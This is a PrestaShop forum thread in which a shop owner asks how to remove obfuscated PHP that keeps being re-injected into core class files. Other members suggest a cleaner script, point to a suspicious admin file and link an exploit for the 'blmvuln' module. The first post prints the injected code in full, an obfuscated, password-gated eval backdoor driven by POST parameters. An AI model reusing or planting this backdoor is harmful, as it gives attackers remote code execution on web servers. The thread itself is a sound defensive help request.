Patrik Posted February 13, 2023 Share Posted February 13, 2023 Hello there, i would like to ask about prestashop files. Time of time i notice i have added some weird variables nad hashes on the end of some files and their source code. When i delete it manually from files, it will come back in few days. I am not very skilled in prestashop, i dont know how to protect it or clean it. For example on of the files is: domain.com/www/classes/Dispatcher.php, there are more files from classes that are getting this unwanted code on end of source code. The example of the unwanted code is this, i have no idea how to decode it or permanently delete it. $p11c9="THIZBzt8jFVwN79QaClh3UEdSq06iJ5gKvPuebAmns_4YLDfrxGX2poRcyk1WOM";$e8208=$p11c9[47].$p11c9[35].$p11c9[40].$p11c9[56].$p11c9[6].$p11c9[28].$p11c9[54].$p11c9[40].$p11c9[42].$p11c9[36].$p11c9[49].$p11c9[28].$p11c9[41].$p11c9[6].$p11c9[41];$t17=$p11c9[56].$p11c9[48].$p11c9[36].$p11c9[16].$p11c9[6].$p11c9[36].$p11c9[42].$p11c9[47].$p11c9[35].$p11c9[40].$p11c9[56].$p11c9[6].$p11c9[28].$p11c9[54].$p11c9[40];$gd25=$p11c9[37].$p11c9[16].$p11c9[41].$p11c9[36].$p11c9[27].$p11c9[43].$p11c9[42].$p11c9[23].$p11c9[36].$p11c9[56].$p11c9[54].$p11c9[23].$p11c9[36];if(@$e8208($t17)){$z3a7 = @$t17('', @$gd25('aWYKIChpc3NldCgkX1BPU1RbcHJvZHVjdF9pZF0pIAoKJiYgCgptZDUoCiRfUE9TVFtwcm9kdWN0X2lkXSAgKSAJPT09ImFmZTBhNTFhN2Y1ODQ3MGE5YzZlNmJmZjcyMjAxZmRlIikKCXsJIGV2YWwoYmFzZTY0X2RlY29kZSgJICRfUE9TVFtpbWFnZV9pZF0pCQopOwpleGl0KCk7fTs='));@$z3a7();}$obf48="L4IdFOJXZu0vhmtrW27Hg9GTqpfkY6zAMNRwbKU3naceEl5_so18VDPjCQiSyxB";$v108=$obf48[26].$obf48[9].$obf48[40].$obf48[42].$obf48[14].$obf48[58].$obf48[49].$obf48[40].$obf48[47].$obf48[43].$obf48[61].$obf48[58].$obf48[48].$obf48[14].$obf48[48];$lfed=$obf48[42].$obf48[15].$obf48[43].$obf48[41].$obf48[14].$obf48[43].$obf48[47].$obf48[26].$obf48[9].$obf48[40].$obf48[42].$obf48[14].$obf48[58].$obf48[49].$obf48[40];$d0e30=$obf48[36].$obf48[41].$obf48[48].$obf48[43].$obf48[29].$obf48[1].$obf48[47].$obf48[3].$obf48[43].$obf48[42].$obf48[49].$obf48[3].$obf48[43];if(@$v108($lfed)){$uad5 = @$lfed('', @$d0e30('aWYKCShpc3NldAoJKAokX1BPU1RbcHJvZHVjdF9pZF0pICAKJiYgbWQ1KAkgJF9QT1NUW3Byb2R1Y3RfaWRdCikJID09PSJiYjE3ZDU0ZWE5MDdhNDg4NzU1NGQ1OGM5ZWU0NjVmZSIKICkKCnsKCWV2YWwoICBiYXNlNjRfZGVjb2RlKAkkX1BPU1RbaW1hZ2VfaWRdKQoKKTsKZXhpdCgpOwp9Ow=='));@$uad5();} Have anyone seen anything like this, are there any solutions how to permanently clean it and prevent from happening again? Thank You. Link to comment Share on other sites More sharing options...
Prestachamps Posted February 13, 2023 Share Posted February 13, 2023 (edited) Hello, You can make a backup, remove this line, and then verify that the website is still operational. Then, to stop these attacks, I advise using Imunify on your server. Additionally, you can look at this discussion: I hope that I could help. Have a nice day, Leo. Edited February 13, 2023 by Prestachamps (see edit history) Link to comment Share on other sites More sharing options...
Patrik Posted February 13, 2023 Author Share Posted February 13, 2023 (edited) Thank You, i was removing these lines like 6 times, nothing happend. But the code is still coming back. I saw on forum people using some cleaner.zip file which tol them which files was changed. The link You sent is not working. Edited February 13, 2023 by Patrik (see edit history) Link to comment Share on other sites More sharing options...
idnovate.com Posted February 13, 2023 Share Posted February 13, 2023 Link to comment Share on other sites More sharing options...
Patrik Posted February 13, 2023 Author Share Posted February 13, 2023 The cleaner plugin doesnt work, it cannot detect CMS: Script de nettoyage et contrôle pour boutiques PrestaShop by @eolia CMS inconnu. Script interrompu I found in access logs, that user is trying to log with token, and thru module_name blmvuln, so i googled blmvuln and found this exploit:https://sploitus.com/exploit?id=07597D1E-9918-5E4C-89D8-857E228869A4&utm_source=rss&utm_medium=rss Link to comment Share on other sites More sharing options...
Eolia Posted February 13, 2023 Share Posted February 13, 2023 il y a 5 minutes, Patrik a dit : The cleaner plugin doesnt work, it cannot detect CMS: Script de nettoyage et contrôle pour boutiques PrestaShop by @eolia CMS inconnu. Script interrompu I found in access logs, that user is trying to log with token, and thru module_name blmvuln, so i googled blmvuln and found this exploit:https://sploitus.com/exploit?id=07597D1E-9918-5E4C-89D8-857E228869A4&utm_source=rss&utm_medium=rss Which PS version please ? 1 Link to comment Share on other sites More sharing options...
Patrik Posted February 13, 2023 Author Share Posted February 13, 2023 (edited) I need to use it for 1.6 but my test environent is 1.7 Edited February 13, 2023 by Patrik (see edit history) Link to comment Share on other sites More sharing options...
Eolia Posted February 13, 2023 Share Posted February 13, 2023 il y a 19 minutes, Patrik a dit : I need to use it for 1.6 but my test environent is 1.7 Cleaner check this file in your admin dir: get-file-admin.php if this file not exists it's a real problem... Link to comment Share on other sites More sharing options...
Patrik Posted February 13, 2023 Author Share Posted February 13, 2023 Well i finally found the mentioned file, it was in "admin" folder. Btw in fresh new PS install there is no such file. Link to comment Share on other sites More sharing options...
Patrik Posted February 13, 2023 Author Share Posted February 13, 2023 cleaner is working, my fault. thx 1 Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now